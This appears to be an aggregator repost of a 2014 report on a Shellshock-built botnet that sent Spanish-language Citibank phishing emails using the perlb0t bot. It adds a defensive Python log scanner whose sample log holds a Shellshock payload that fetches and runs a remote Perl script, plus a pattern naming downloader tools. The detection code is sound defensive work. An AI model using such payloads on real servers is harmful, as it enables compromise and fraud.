HackDig : Dig high-quality web security articles for hackers

As expected, Shellshock is being used for phishing attacks

2014-10-17 16:35

Via Lancope, a botnet built by exploiting the Shellshock vulnerability is being used for phishing attacks:

"Phishing appeared to be the name of the game for these particular attackers, as it made up most of the malicious activity that we observed in the botnet. . . . The attackers commanded all of the infected hosts to reach out to a separate storage server containing PHP code used to build and send emails, as well as over 10 million email addresses.

The bots reported over 100,000 phishing emails sent. The emails attempted to phish Spanish-speaking Citibank users. The message, in Spanish, tells potential victims that their Citibank card has been deactivated for security reasons and can be reactivated at a link that they supply."

In the case observed by Lancope, the cybercriminals deployed code to compromise a vulnerable server and then commanded the server to download mailer scripts used to deploy the phishing emails. Figure 1 shows the script used to compromise the server. The mailer script was v0.5 of perlb0t, a.k.a. w0rmb0t or "LinuxNet perlbot" (see Figure 2). The bot, which was seen in attacks dating back to 2006, was written using Portuguese for variable names and some literal strings like error messages. It contains a port scanner, simple command shell, and flooder (DDoS) subroutines, and it uses IRC for C2.

Figure 1. Code deployed to compromise vulnerable systems.

Figure 2. Perl code from the bot used to obtain email software and deploy phishing emails.
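A defender-side check for the activity described above, as an added example that is not code from the original post or from Lancope: it scans web access logs for the Bash function-definition prefix that Shellshock requests carry in a logged field and reports whether the injected command fetches a remote file. The log lines, addresses and URL are constructed, and the Apache "combined" log format is an assumption.

```python
import re

# Constructed Apache "combined" access-log lines (not taken from the report).
SAMPLE_LOG = r'''
198.51.100.7 - - [17/Oct/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget -O /tmp/m http://files.example.invalid/m.pl; perl /tmp/m\""
203.0.113.9 - - [17/Oct/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [17/Oct/2014:10:02:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; echo probe" "Mozilla/5.0"
'''

# Quoted fields may contain \" because Apache escapes quotes in logged headers.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    + QUOTED.replace('(', '(?P<request>', 1) + r' (?P<status>\d{3}) \S+ '
    + QUOTED.replace('(', '(?P<referer>', 1) + ' '
    + QUOTED.replace('(', '(?P<agent>', 1)
)
# "() {" is how Bash marks an exported function; a value starting this way
# in a request field is the Shellshock trigger.
FUNC_DEF_RE = re.compile(r'\(\s*\)\s*\{')
DOWNLOADER_RE = re.compile(r'\b(wget|curl|fetch|lwp-download)\b')
URL_RE = re.compile(r'https?://[^\s;"\'\\]+')

def scan(log_text):
    """Return one finding per logged field that carries the trigger."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank or unparseable line
        for field in ("request", "referer", "agent"):
            value = m.group(field)
            if FUNC_DEF_RE.search(value):
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "field": field,
                    "status": int(m.group("status")),
                    # True when the payload pulls a second-stage file,
                    # as with the mailer scripts described above.
                    "downloads": bool(DOWNLOADER_RE.search(value)),
                    "urls": URL_RE.findall(value),
                })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Any URL reported in `urls` is a candidate staging server to block and to search for in outbound proxy or DNS logs.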

It's also interesting that the report mentions the botnet contains VoIP systems compromised via Shellshock, which isn't surprising considering they likely weren't at the top of the list of systems to patch for most organizations. That being said, the phone systems used in vishing and SMiShing attacks are often compromised VoIP servers.

More information on Shellshock and vishing:


Source: skcatta-gnihsihp-rof-desu-gnieb-si-kcohsllehs/moc.sbalhsihp.golb
